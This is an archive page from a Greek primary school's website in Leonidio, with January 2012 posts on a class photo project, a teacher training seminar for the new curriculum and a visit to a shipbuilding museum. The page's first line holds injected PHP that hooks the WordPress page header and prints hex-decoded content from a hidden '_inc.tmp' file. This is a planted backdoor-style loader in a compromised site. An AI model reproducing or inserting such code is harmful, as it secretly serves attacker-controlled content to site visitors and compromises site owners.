if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ιανουάριος, 2012 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Ιανουάριος 2012

Ε2 χαρτο-φωτο-γράφηση της όμορφης τάξης μας

Σήμερα με τους μαθητές του Ε2 στο μάθημα της μουσικής προσπαθήσαμε και καταφέραμε
όλοι μαζί να φωτογραφήσουμε, με την βοήθεια της τεχνολογίας την όμορφη τάξη μας.
Το αποτέλεσμα είναι εκπληκτικό και σίγουρα θα σας ενθουσιάσει!

Επιμόρφωση Εκπαιδευτικών Δημοτικού Σχολείου Λεωνιδίου

Στο πλαίσιο της Πράξης «ΝΕΟ ΣΧΟΛΕΙΟ (Σχολείο 21ου αιώνα) ? Νέο πρόγραμμα σπουδών» πραγματοποιήθηκε στο Δημοτικό Σχολείο Λεωνιδίου τριήμερο επιμορφωτικό σεμινάριο των εκπαιδευτικών από τους επιμορφωτές του Παιδαγωγικού Ινστιτούτου κ. Αθανάσιο Γιαννίκα (Σχολικός Σύμβουλος), Κωνσταντίνο Βρυώνη (Δάσκαλος Επιμορφωτής) και Πήλιουρα Παναγιώτη (Σχολικός Σύμβουλος).

Κατά το σχολικό έτος 2011-12, θα εφαρμοστούν πιλοτικά σε 188 πιλοτικές σχολικές μονάδες (21 νηπιαγωγεία, 99 δημοτικά, 68 γυμνάσια). Κατά την πιλοτική εφαρμογή, τα Νέα Προγράμματα Σπουδών θα ανατροφοδοτούνται από την εκπαιδευτική πράξη ώστε να εμπλουτισθούν και να βελτιωθούν όπου αυτό είναι αναγκαίο.

Για την επίτευξη των στόχων του προγράμματος προβλέπεται:

(α) Να γίνει στοχευμένη επιμόρφωση όλων των εμπλεκομένων με την πιλοτική εφαρμογή (εκπαιδευτικών, διευθυντών σχολικών μονάδων, εκπαιδευτών εκπαιδευτικών, Σχολικών Συμβούλων).

(β) Να γίνει ευρείας έκτασης πιλοτική εφαρμογή των νέων Π.Σ. σε επιλεγμένες σχολικές μονάδες «πιλοτικά» σχολεία» (νηπιαγωγεία, δημοτικά και γυμνάσια).

(γ) Να εξασφαλιστεί η παρακολούθηση και υποστήριξη του έργου των εκπαιδευτικών, ώστε άμεσα να καλύπτεται οποιαδήποτε ανάγκη παρουσιάζεται και να επιλύονται τυχόν προβλήματα που προκύπτουν. Τα πιλοτικά σχολεία θα έχουν τη δυνατότητα ανατροφοδοτικής επικοινωνίας.

(δ) Να γίνει εκτενής χρήση της εσωτερικής διαμορφωτικής αξιολόγησης καθώς και εξωτερική αξιολόγηση, ώστε να παρακολουθηθεί η πορεία και η αποτελεσματικότητα της εισαγωγής του συνόλου των νέων Π.Σ. Η καταγραφή και η επεξεργασία του συνόλου των δεδομένων που θα προκύψουν από τις διαδικασίες της πιλοτικής εφαρμογής θα επιτρέψουν την εξαγωγή συμπερασμάτων για την τελική διαμόρφωση και των Προγραμμάτων Σπουδών καθώς και του απαραίτητου διδακτικού υλικού, με στόχο την αποτελεσματικότερη γενίκευση της εφαρμογής τους.

Επίσκεψη στο Μουσείο Ναυπηγικής Τέχνης στο Λεωνίδιο

Οι μαθητές του Δημοτικού Σχολείου Λεωνιδίου επισκέφτηκαν την Έκθεση Ναυπηγικής Τέχνης στο Λεωνίδιο, κατά την διάρκεια της οποίας ενημερώθηκαν από τον Υπεύθυνο κ. Δημήτριο Παναγιωτίδη για την διαδικασία κατασκευής μοντέλων σύγχρονων αλλά και παλαιότερων πλοίων.

Οι μαθητές αλλά και οι δάσκαλοι αποκόμισαν τις καλλύτερες εντυπώσεις και ζήτησαν ένθερμα από τον κ. Παναγιωτίδη όπως δημιουργηθούν τμήματα διδασκαλίας της Ναυπηγικής Τέχνης για μικρούς μαθητές.

Ευχαριστούμε θερμά, δάσκαλοι και μαθητές, τον κ. Παναγιωτίδη για την υποδοχή και την ξενάγηση στα μυστικά της τέχνης του.